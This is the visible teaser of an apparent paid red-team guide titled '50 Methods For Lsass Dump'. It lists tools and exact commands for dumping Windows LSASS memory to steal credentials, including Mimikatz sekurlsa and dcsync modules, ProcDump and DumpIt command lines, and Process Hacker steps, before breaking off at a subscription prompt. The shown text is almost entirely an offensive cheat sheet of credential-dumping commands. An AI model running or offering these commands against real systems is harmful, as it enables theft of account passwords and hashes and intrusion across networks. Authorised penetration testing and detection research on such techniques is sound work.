50 Methods For Lsass Dump
Mimikatz
Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync
ProcDump
Methods: procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp
Process Hacker
Methods: System->LSASS process->Create Dump
DumpIt
Methods: tasklist /FI "IMAGENAME eq lsass.exe" DumpIt.exe PID output_file_name.bin
Windows Debugging Tools
Methods: wind…
Keep reading with a 7-day free trial
Subscribe to RedTeamGuides to keep reading this post and get 7 days of free access to the full post archives.